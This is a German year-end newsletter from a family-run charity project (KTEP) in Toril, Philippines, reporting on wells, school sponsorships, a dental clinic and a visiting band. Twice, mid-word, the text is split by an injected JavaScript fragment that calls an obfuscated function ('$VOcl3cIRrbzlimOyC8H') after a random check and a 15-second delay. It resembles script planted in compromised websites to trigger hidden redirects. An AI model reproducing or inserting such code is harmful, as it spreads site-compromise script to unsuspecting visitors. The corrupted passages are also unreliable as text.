Liebe Freunde und Unterstützer des KTEP – Projektes,

ein spannendes Jahr 2010 geht zu Ende, in dem viel passiert ist bei KTEP. Ganz offensichtlich ist die Weihnachtsüberraschung unserer Söhne Mark und Oliver. Heimlich und von uns unbemerkt haben sie in vielen, vielen Stunden unsere Projekt – Website von Grund auf neu programmiert und gestaltet. Ein herzlicher Dank von der ganzen KTEP – Familie an die zwei Jungs für dieses tolle Geschenk!

Begonnen hat das Jahr gleich mit dem absoluten Höhepunkt, der Konzertreise des Musikvereins Kressbronn nach..

Toril. Die 46 Musikantinnen und Musikanten samt Bürgermeister haben in 7 Konzerten die Herzen der Filipinos im Sturm erobert. Und die riesige Hilfsbereitschaft der Musikanten und ihrer Freunde nach der Reise hat alle Erwartungen bei weitem übertroffen. So konnten über 40 neue Schulpatenschaften geschlossen und mehr als ein Dutzend neue Trinkwasserbrunnen gebaut werden. Ein herzliches Vergelt´s Gott für diese großartige Hilfe im Namen der armen Menschen von Toril und Umgebung an die Kressbronner Musikanten.

Im Frühjahr erreichten uns leider traurige Nachrichten aus Toril. Einer unserer ehemaligen Schüler, der inzwischen als beliebter und geschätzter Lehrer am Davao Central College gearbeitet hatte, ist an Krebs gestorben. Wir werden die liebenswerte und hilfsbereite Art von Ray Marayag sehr vermissen und ihm ein ehrendes Andenken bewahren.

Das Projekt Trinkwasserversorgung war ein eindeutiger Schwerpunkt im vergangenen Jahr. Während beim Besuch des Musikvereins gerade Brunnen Nr. 59 des Kressbronner Handom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andels- und Gewerbevereins HGV im Bau war, konnte kurz vor Weihnachten schon Brunnen Nr. 87, gespendet von Frau Renate Fiegle aus Kressbronn fertig gestellt werden. Innerhalb eines Jahres konnten wir somit über 13.000 Menschen mit sauberem Trinkwasser versorgen. Das rotarische Großprojekt, ein sogenanntes „Matching Grant“ zwischen Rotary International, den Rotary Clubs von Ravensburg, Montelimar (Südfrankreich) und Toril konnte ebenfalls im Dezember fertig gestellt werden. In einem Zeitraum von fast zwei Jahren wurden insgesamt 21 Brunnen durch dieses Gemeinschaftsprojekt finanziert.

Und neben vielen andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anderen Aktivitäten war unsere KTEP – Zahnarztklinik ein weiterer Schwerpunkt des Jahres. Höhepunkt war hier der Besuch der Kressbronner Zahnarztfamilie Dr. Reinhold und Dr. Ute Fiegle, die ihren Urlaub nicht zuletzt dazu genutzt haben, fast 200 kleinen und großen Patienten ihre Zahnschmerzen zu lindern und Dutzende von Zähnen zu ziehen. Herzlichen Dank für diese tolle, unentgeltliche Hilfe im Namen der ganzen KTEP – Familie.

Die Planungen für das nächste Highlight im Projektjahr sind bereits in vollem Gange. Im Februar wird eine Gruppe von rotarischen Freunden aus den Clubs Friedrichshafen – Tettnang, Friedrichshafen – Lindau und Ravensburg unser Projekt in Toril besuchen. Darauf freuen sich nicht nur die vielen Patenkinder, die durch die Rotarier unterstützt werden, sondern die ganze KTEP-Familie.

Nun wünschen wir allen unseren Freunden und Unterstützern ein gesundes, zufriedenes Jahr 2011. Viel Spaß beim Stöbern auf unserer nagelneuen Website!

Vielen herzlichen Dank für Eure großartige Hilfe und Unterstützung!

Herzlichst,  Eure Kugel – family

Reinhold und Aurora Kugel mit Mark, Melissa und Oliver